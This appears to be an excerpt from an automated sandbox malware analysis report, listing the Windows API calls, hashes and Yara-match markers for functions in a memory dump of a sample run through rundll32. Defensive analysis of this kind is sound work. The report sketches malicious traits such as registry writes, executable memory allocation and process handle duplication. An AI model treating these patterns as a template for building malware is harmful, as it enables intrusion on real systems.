                              • Opcode ID: 7e7bc835be2c3ac1ff1d241419d0541bdf399ce70360909c90cd42671b60a111
                              • Instruction ID: b6987eade3c3c55a601752f185c3d95d4adf4e62513d10c438b618945400030e
                              • Opcode Fuzzy Hash: 7e7bc835be2c3ac1ff1d241419d0541bdf399ce70360909c90cd42671b60a111
                              • Instruction Fuzzy Hash: 67415DB1A0020AEFDB10DFA8D885EAEB7FDEF44318B154555F949D7211EB30EA11CB60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlenW.KERNEL32(?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?), ref: 059463F5
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 05946407
                              • wcstombs.NTDLL ref: 05946415
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?), ref: 05946439
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0594644E
                              • mbstowcs.NTDLL ref: 0594645B
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 0594646D
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000001,00000001,?,0593A7C4,?,?,?,?,?), ref: 05946487
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$mbstowcswcstombs
                              • String ID:
                              • API String ID: 316328430-0
                              • Opcode ID: 4bb24f8bbc09a8980287e0a14c3c223ff03205f99285acced636a50b892bfa11
                              • Instruction ID: 86cb73bb1ded559518c62bef92c09109cf27b7f6d78501440bf17b93fcc93eca
                              • Opcode Fuzzy Hash: 4bb24f8bbc09a8980287e0a14c3c223ff03205f99285acced636a50b892bfa11
                              • Instruction Fuzzy Hash: 31214C7151430AFFDF119FA4EC09E9ABFB9FB45311F104125FA05A2061DB719A64DF60
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(0594E453,00000000,00000000,0595A440,?,?,0593F68B,0594E453,00000000,0594E453,0595A420), ref: 0593D935
                              • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 0593D943
                              • wsprintfA.USER32 ref: 0593D95F
                              • RegCreateKeyA.ADVAPI32(80000001,0595A420,00000000), ref: 0593D977
                              • lstrlen.KERNEL32(?), ref: 0593D986
                              • RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 0593D994
                              • RegCloseKey.ADVAPI32(?), ref: 0593D99F
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0593D9AE
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
                              • String ID:
                              • API String ID: 1575615994-0
                              • Opcode ID: e08c822e96cbae2c0b35ada5b27c5813ef1493c7b8633f2e1675d0e34106c559
                              • Instruction ID: b373637e72dc8ee67c1d19649ff699d11bc0bb2a44e243f5a16ae37e71d731d1
                              • Opcode Fuzzy Hash: e08c822e96cbae2c0b35ada5b27c5813ef1493c7b8633f2e1675d0e34106c559
                              • Instruction Fuzzy Hash: F3115B32124209FFEB015BA4EC4AEAABF7DEB49755F104021FA0596160EF729D24DBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • OpenProcess.KERNEL32(00000040,00000000,?), ref: 0594FE12
                              • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 0594FE30
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 0594FE38
                              • DuplicateHandle.KERNEL32(?,00000000,?,00000000,00000000,00000002), ref: 0594FE56
                              • GetLastError.KERNEL32 ref: 0594FE6A
                              • RegCloseKey.ADVAPI32(?), ref: 0594FE75
                              • CloseHandle.KERNEL32(00000000), ref: 0594FE7C
                              • GetLastError.KERNEL32 ref: 0594FE84
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseErrorHandleLastOpen$CreateDuplicateProcess
                              • String ID:
                              • API String ID: 3822162776-0
                              • Opcode ID: a0b0bb5b7cbe048b7d865ef43c19e9e8ae159209edd03ad18b59a5324a540853
                              • Instruction ID: 0851779e174b00fb18a5a6649cb59e9d4515bb1798f6381ac4ed57af4c38c295
                              • Opcode Fuzzy Hash: a0b0bb5b7cbe048b7d865ef43c19e9e8ae159209edd03ad18b59a5324a540853
                              • Instruction Fuzzy Hash: 34110C7611830AEFEB015FA5E849EAA7F6DFB44352F108010FA0A86252DF71CD64CB61
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeap
                              • String ID:
                              • API String ID: 1279760036-0
                              • Opcode ID: 66db996fe3d30039eec0be54ad05e4d6a77be33ba9dfae6ae83b75637d361b50
                              • Instruction ID: 982adc8c831b530b1c6ca70b46d80e69454dcddc1a6519d4f159f8d35c0378d9
                              • Opcode Fuzzy Hash: 66db996fe3d30039eec0be54ad05e4d6a77be33ba9dfae6ae83b75637d361b50
                              • Instruction Fuzzy Hash: 2EB10071D01219EFDF21DFA4C94ABAEBBB9FF05318F044065E801B7260D7B5AA94CB91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • memcpy.NTDLL(?,?,0000000D,?,?,00000000,?,?,?,?,?,?,?,?,05952801,?), ref: 0595242E
                              • memcpy.NTDLL(?,?,0000000D,?,?,0000000D,?,?,00000000), ref: 0595243B
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • memcpy.NTDLL(00000000,?,?,00000008,?,00000001,05952801,00000000,00000001,?,?,?,?,05952801,?,00000000), ref: 059525C9
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: memcpy$AllocateHeap
                              • String ID:
                              • API String ID: 4068229299-0
                              • Opcode ID: 301c4b814cf5b71d3ef814d382b5c30ff439b0aa9b52c629491c9bfe05105596
                              • Instruction ID: 2c1a76e9a8901613393966b8da05b91ed4891fd5092959741ac0966b559808d6
                              • Opcode Fuzzy Hash: 301c4b814cf5b71d3ef814d382b5c30ff439b0aa9b52c629491c9bfe05105596
                              • Instruction Fuzzy Hash: CEB12D7960020AABDF11DFA4DD84EEE7BADBF44620F044125FD159B151EB30EA25CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCommandLineA.KERNEL32(059560F0,00000038,0593E22A,00000000,76CDF5B0,05940348,?,00000001,?,?,?,?,?,?,?,05939100), ref: 0593BA7C
                              • StrChrA.SHLWAPI(00000000,00000020,?,?,?,?,?,?,?,05939100,?,?,?,?,?), ref: 0593BA8D
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
                              • ExitProcess.KERNEL32 ref: 0593BC6F
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05F3C304,00000000,?,05936584,?), ref: 0593A90E
                                • Part of subcall function 0593A8E9: StrTrimA.SHLWAPI(00000020,05955FCC,00000000,?,05936584,?), ref: 0593A92D
                                • Part of subcall function 0593A8E9: StrChrA.SHLWAPI(00000020,?,?,05936584,?), ref: 0593A939
                              • lstrcmp.KERNEL32(?,?), ref: 0593BAFB
                              • VirtualAlloc.KERNEL32(00000000,0000FFFF,00001000,00000040,?,?,?,?,?,?,?,05939100,?), ref: 0593BB13
                                • Part of subcall function 05934BC4: GetLastError.KERNEL32(000000FF,00000008,?,000000FF,05F3B7F0,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000), ref: 05934C04
                                • Part of subcall function 05934BC4: CloseHandle.KERNEL32(000000FF,?,?,0594B7F2,0000003A,05F3B7F0,?,0594A2EB,00000001,?,00000000,00000000,00000000,?,0593109E,05959F2C), ref: 05934C0F
                              • VirtualFree.KERNEL32(?,00000000,00008000,0000004B,00000000,00000000,-00000020,?,?,?,?,?,?,?,05939100,?), ref: 0593BB85
                              • lstrcmp.KERNEL32(?,?), ref: 0593BB9E
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtuallstrcmp$AllocCloseCommandErrorExitFreeHandleLastLineProcessTrimlstrlenmemcpymemset
                              • String ID:
                              • API String ID: 739714153-0
                              • Opcode ID: ca3f48ac8ef4723057b9ff3c563f7b01fe0b740db4b679a013858cc15752f5ad
                              • Instruction ID: fed38fe569a9b59a883bc02ae398c6a936973d44582b21c688cc1c51a95cbc83
                              • Opcode Fuzzy Hash: ca3f48ac8ef4723057b9ff3c563f7b01fe0b740db4b679a013858cc15752f5ad
                              • Instruction Fuzzy Hash: A6512971A10219EFDF20EBA4CC8AEEEBBBAFF48710F144425F105E6164DB35A951CB64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 059494B7
                              • StrTrimA.SHLWAPI(00000000,?), ref: 059494D4
                              • HeapFree.KERNEL32(00000000,00000000), ref: 05949507
                              • RtlImageNtHeader.NTDLL(00000000), ref: 05949532
                              • HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 059495F7
                                • Part of subcall function 0593D4DA: lstrlen.KERNEL32(?,00000000,76C86980,00000000,0593DA7B,?), ref: 0593D4E3
                                • Part of subcall function 0593D4DA: memcpy.NTDLL(00000000,?,00000000,?), ref: 0593D506
                                • Part of subcall function 0593D4DA: memset.NTDLL ref: 0593D515
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 059495A8
                              • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 059495D7
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
                              • String ID:
                              • API String ID: 239510280-0
                              • Opcode ID: beb3e083c9b8ca568ba589b075c726501f0f0b18aa1a2454e5aec28f86f759d0
                              • Instruction ID: 4e876dd6d3c20c18a9bee83b582872690a4b20ce49123d189d91098e950b057a
                              • Opcode Fuzzy Hash: beb3e083c9b8ca568ba589b075c726501f0f0b18aa1a2454e5aec28f86f759d0
                              • Instruction Fuzzy Hash: 7141A231618345FBDB229BA4CC49FAF7FAAEB45750F244024FA09AB180DB759E50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • lstrlen.KERNEL32(00000000,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D6F2
                              • lstrlen.KERNEL32(?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D710
                              • RtlAllocateHeap.NTDLL(00000000,76C86985,?), ref: 0594D73C
                              • memcpy.NTDLL(00000000,00000000,00000000,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D753
                              • HeapFree.KERNEL32(00000000,00000000), ref: 0594D766
                              • memcpy.NTDLL(00000000,?,?,?,?,00000001,00000001,?,05931785,?,?,?,?,?), ref: 0594D775
                              • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,00000001,00000001,?,05931785,?,?,?), ref: 0594D7D9
                                • Part of subcall function 0593F307: RtlLeaveCriticalSection.NTDLL(?), ref: 0593F384
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Freelstrlenmemcpy$AllocateCriticalLeaveSection
                              • String ID:
                              • API String ID: 1635816815-0
                              • Opcode ID: f5be4fa09bf21bcb088ba21ddb1cd2c612e873e7df1b34fcac656e3210df9a67
                              • Instruction ID: 83a2eedfd348f53355bdf272254a66ca8450742b96a6e66e51bd9e2e710f17d6
                              • Opcode Fuzzy Hash: f5be4fa09bf21bcb088ba21ddb1cd2c612e873e7df1b34fcac656e3210df9a67
                              • Instruction Fuzzy Hash: 39417C75A00318EBDB21AFA4CC89FAEBFA9FF44350F054125F909A7150D770AD50DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlImageNtHeader.NTDLL ref: 059445B6
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059445F9
                              • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 05944614
                              • CloseHandle.KERNEL32(?,?,?,00000000,?,?,?), ref: 0594466A
                              • HeapFree.KERNEL32(00000000,?,?,00000000,00000000,?,?,?), ref: 059446C6
                              • RegCloseKey.ADVAPI32(?,?,?,00000000,?,?,?), ref: 059446D4
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 059446DF
                                • Part of subcall function 059326D3: RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 059326E7
                                • Part of subcall function 059326D3: memcpy.NTDLL(00000000,?,?,?), ref: 05932710
                                • Part of subcall function 059326D3: RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 05932739
                                • Part of subcall function 059326D3: RegCloseKey.ADVAPI32(?), ref: 05932764
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Close$CriticalSection$CreateEnterFreeHandleHeaderHeapImageLeaveOpenValuememcpy
                              • String ID:
                              • API String ID: 3181710096-0
                              • Opcode ID: 4e537785b6aebe41582c29cb8a7a990f5ee493e86661736aefca074286b790db
                              • Instruction ID: d48299520bbbb5b3b7ae49ed55be05f55dc49fbd1e5699066c5c189b3716d8d6
                              • Opcode Fuzzy Hash: 4e537785b6aebe41582c29cb8a7a990f5ee493e86661736aefca074286b790db
                              • Instruction Fuzzy Hash: B9416772218305ABEF218F65E88AF6A7BADFF40651F144024F90ADA150DB70DD60CFA4
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • GetCurrentThreadId.KERNEL32 ref: 05951AED
                              • GetWindowThreadProcessId.USER32(00000000,?), ref: 05951B1B
                              • GetWindowThreadProcessId.USER32(?,?), ref: 05951B60
                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 05951B88
                              • _strupr.NTDLL ref: 05951BB3
                              • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05951BC0
                              • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000104), ref: 05951BDA
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: ProcessThread$Window$CloseCurrentHandleOpen_struprlstrlen
                              • String ID:
                              • API String ID: 3831658075-0
                              • Opcode ID: bfafabb1eb48cf5ee5f5141460a3b57fe0c23dcedcec4f3347b9112519b45bf2
                              • Instruction ID: 3139fd9dd75d7eed38438aab234722e3fd13594de68ab454f4cf3cb11a1e6aab
                              • Opcode Fuzzy Hash: bfafabb1eb48cf5ee5f5141460a3b57fe0c23dcedcec4f3347b9112519b45bf2
                              • Instruction Fuzzy Hash: 49413971D04218EBDF21DFA4CC4ABEEBBBDBB48711F144056FA06A2150DB7596A0DF90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • StrChrA.SHLWAPI(?,0000002C,00003219), ref: 05944943
                              • StrTrimA.SHLWAPI(?,?), ref: 05944961
                              • StrTrimA.SHLWAPI(?,?,?,?,00000001), ref: 059449CA
                              • HeapFree.KERNEL32(00000000,00000000,?,?,00000001), ref: 059449EB
                              • DeleteFileA.KERNEL32(?,00003219), ref: 05944A0D
                              • HeapFree.KERNEL32(00000000,?), ref: 05944A1C
                              • HeapFree.KERNEL32(00000000,?,00003219), ref: 05944A34
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileFreeHeapTemp$PathTimeTrim$CurrentDeleteNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 1078934163-0
                              • Opcode ID: c00eb672c8f4c8257ec6c98a1220c12652b3eb7e0e62adaac561f23d9c28459d
                              • Instruction ID: cbe9b91e81418a7d82dc57f1f5386393c3ef62adec57d03b4f3a1df275d7ca8e
                              • Opcode Fuzzy Hash: c00eb672c8f4c8257ec6c98a1220c12652b3eb7e0e62adaac561f23d9c28459d
                              • Instruction Fuzzy Hash: B431EE32218306AFEB10EBA4DD05F6ABBECFF49B01F040514FA48D7141DB64ED199BA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000,05938478,00000000), ref: 0593E02B
                              • RtlAllocateHeap.NTDLL(00000000,00000024), ref: 0593E040
                              • memset.NTDLL ref: 0593E04D
                              • HeapFree.KERNEL32(00000000,00000000,?,05938477,?,?,00000000,?,00000000,05949CD0,?,00000000), ref: 0593E06A
                              • memcpy.NTDLL(?,?,05938477,?,05938477,?,?,00000000,?,00000000,05949CD0,?,00000000), ref: 0593E08B
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$Allocate$Freememcpymemset
                              • String ID: chun
                              • API String ID: 2362494589-3058818181
                              • Opcode ID: fcfd2a5b10755ff67598a9341ad112aedc430fd160e02891c2834361fc577d2b
                              • Instruction ID: 3839cf6ea72becee73828186dbf145a7b2870dc8d111e9d1c84c77419794905c
                              • Opcode Fuzzy Hash: fcfd2a5b10755ff67598a9341ad112aedc430fd160e02891c2834361fc577d2b
                              • Instruction Fuzzy Hash: 81315971608706EFDB309FA5D846A26BBEDFF48210B018529F94ACB220DB70F915CB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 05938ED3
                                • Part of subcall function 0593A5E7: lstrlen.KERNEL32(00000000,76CDF730,-00000001,00000000,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5F8
                                • Part of subcall function 0593A5E7: lstrlen.KERNEL32(?,?,?,?,05938EF7,?,00000000,000000FF), ref: 0593A5FF
                                • Part of subcall function 0593A5E7: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 0593A611
                                • Part of subcall function 0593A5E7: _snprintf.NTDLL ref: 0593A637
                                • Part of subcall function 0593A5E7: _snprintf.NTDLL ref: 0593A66B
                                • Part of subcall function 0593A5E7: HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,000000FF), ref: 0593A688
                              • StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,?,00000000,000000FF), ref: 05938F6D
                              • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,000000FF), ref: 05938F8A
                              • DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,000000FF), ref: 05938F92
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,000000FF), ref: 05938FA1
                              Strings
                              Memory Dump Source
                              • Source File: 00000002.00000002.420493042.0000000005930000.00000040.10000000.00040000.00000000.sdmp, Offset: 05930000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_2_2_5930000_rundll32.jbxd
                              Similarity
                              • API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
                              • String ID: s:
                              • API String ID: 2960378068-2363032815
                              • Opcode ID: 899713fce9f73df83195422aff845777442751a2c251b73bf5959376c59e2ff7
                              • Instruction ID: ab99a7e0d61153798453e9511e487c99f45c60ef231537f5939346b686e90820
                              • Instruction Fuzzy Hash: BE314172A14205FFDB10DBE8DD89FDEBFBDAB49211F040555F609E2142EB74A9148BA0

                              APIs
                              • RtlEnterCriticalSection.NTDLL(00000000), ref: 059313F6
                              • lstrcmpiW.KERNEL32(00000000,?), ref: 0593142E
                              • lstrcmpiW.KERNEL32(?,?), ref: 05931443
                              • lstrlenW.KERNEL32(?), ref: 0593144A
                              • CloseHandle.KERNEL32(?), ref: 05931472
                              • DeleteFileW.KERNEL32(?,?,?,?,?,?), ref: 0593149E
                              • RtlLeaveCriticalSection.NTDLL(00000000), ref: 059314BC
                              Similarity
                              • API ID: CriticalSectionlstrcmpi$CloseDeleteEnterFileHandleLeavelstrlen
                              • String ID:
                              • API String ID: 1496873005-0
                              • Opcode ID: aeaa33c03f72f33fbef6519da850a83975dac7c1912ddfc16264cf97dfbeca89
                              • Instruction ID: 876be05189431a496a36f08996857eb9dec2af09e86652313a50272c2a21e019
                              • Instruction Fuzzy Hash: 76218C71A14305EFDB109FB1DC8EEABBBBDFF44204B055124B906E2121EB34E910DB60

                              APIs
                              • lstrlen.KERNEL32(0593F67C,00000000,0595A420,0595A440,?,?,0593F67C,0594E453,0595A420), ref: 0593F802
                              • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 0593F818
                              • lstrlen.KERNEL32(0594E453,?,?,0593F67C,0594E453,0595A420), ref: 0593F820
                              • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0593F82C
                              • lstrcpy.KERNEL32(0595A420,0593F67C), ref: 0593F842
                              • HeapFree.KERNEL32(00000000,00000000,?,?,0593F67C,0594E453,0595A420), ref: 0593F896
                              • HeapFree.KERNEL32(00000000,0595A420,?,?,0593F67C,0594E453,0595A420), ref: 0593F8A5
                              Similarity
                              • API ID: Heap$AllocateFreelstrlen$lstrcpy
                              • String ID:
                              • API String ID: 1531811622-0
                              • Opcode ID: 7883fb96c9e70fceac69f2b9501e1928d2c6d1b22df79949caeadca04c779b3d
                              • Instruction ID: b902381e7cffd20d557b69631d1cb7e67c13c0a47fb31e64f5aeb7dc2831a5cc
                              • Instruction Fuzzy Hash: 5B21D731518344EFEB124F68DC46F6ABFAAFF4A350F154058F84A97211CB399C55D7A0

                              APIs
                              • lstrlenW.KERNEL32(00000000,00000000,?,?,00000000,?,05940E77,00000000), ref: 059513DA
                                • Part of subcall function 05943193: lstrcpy.KERNEL32(-000000FC,00000000), ref: 059431CD
                                • Part of subcall function 05943193: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431DF
                                • Part of subcall function 05943193: GetTickCount.KERNEL32 ref: 059431EA
                                • Part of subcall function 05943193: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,059513E7,?,?,00000000,?,05940E77,00000000), ref: 059431F6
                                • Part of subcall function 05943193: lstrcpy.KERNEL32(00000000), ref: 05943210
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
                              • lstrcpy.KERNEL32(00000000), ref: 05951415
                              • wsprintfA.USER32 ref: 05951428
                              • GetTickCount.KERNEL32 ref: 0595143D
                              • wsprintfA.USER32 ref: 05951452
                                • Part of subcall function 0594E803: RtlFreeHeap.NTDLL(00000000,?,05943953,?,?,0594BF5B,00000000,00000000,059310B0,00000000,05959F2C,00000008,00000003), ref: 0594E80F
                              Similarity
                              • API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
                              • String ID: "%S"
                              • API String ID: 1152860224-1359967185
                              • Opcode ID: d9d4d64d6218de9f789440393dab895d2891aae97661444ee10db4f2d9362ff2
                              • Instruction ID: 5c6a4748a17910bd9c7108f6484a172833a7419436955e14d7400f99fb7a7190
                              • Instruction Fuzzy Hash: 1E11ACB2609315BFD711ABA49C4DF6FBB9CEF84660B064414F94997201DB78AC10CBB1

                              APIs
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 0594509E
                                • Part of subcall function 0594508C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450B7
                                • Part of subcall function 0594508C: GetCurrentThreadId.KERNEL32 ref: 059450C4
                                • Part of subcall function 0594508C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450D0
                                • Part of subcall function 0594508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,05935112,00000000,?,00000000,00000000,?), ref: 059450DE
                                • Part of subcall function 0594508C: lstrcpy.KERNEL32(00000000), ref: 05945100
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00001ED2,?,00000000,?,?,0593314A,00000000), ref: 059397BD
                              • HeapFree.KERNEL32(00000000,00000000,?,00000000,00001ED2,?,00000000,?,?,0593314A,00000000,00000000,00000004,?,00000000,?), ref: 05939830
                              Similarity
                              • API ID: FileTemp$PathTime$CreateCurrentFreeHeapNameSystemThreadlstrcpy
                              • String ID:
                              • API String ID: 2078930461-0
                              • Opcode ID: 1df39a9b3ed070a39e4a59328cf2d6af726b2a3328a4a47cf7daf5b82ef96a43
                              • Instruction ID: 964852069886f28445f5ed0383122ed8d7e9fb5802361452ba87ea24a489d4e1
                              • Instruction Fuzzy Hash: E511EF31258314FBD7212E31AC8EF7FBF6DEB8A761F010521F64995181DBA2486887E0

                              APIs
                                • Part of subcall function 0594358E: lstrlen.KERNEL32(00000000,00000000,76CC81D0,773BEEF0,?,?,?,0594EA2E,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 059435F5
                                • Part of subcall function 0594358E: sprintf.NTDLL ref: 05943616
                              • lstrlen.KERNEL32(00000000,76CC81D0,?,76C85520,773BEEF0,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA40
                              • lstrlen.KERNEL32(?,?,00000000,0593E842,00000000,05F3C310), ref: 0594EA48
                                • Part of subcall function 05939394: RtlAllocateHeap.NTDLL(00000000,?,05940051), ref: 059393A0
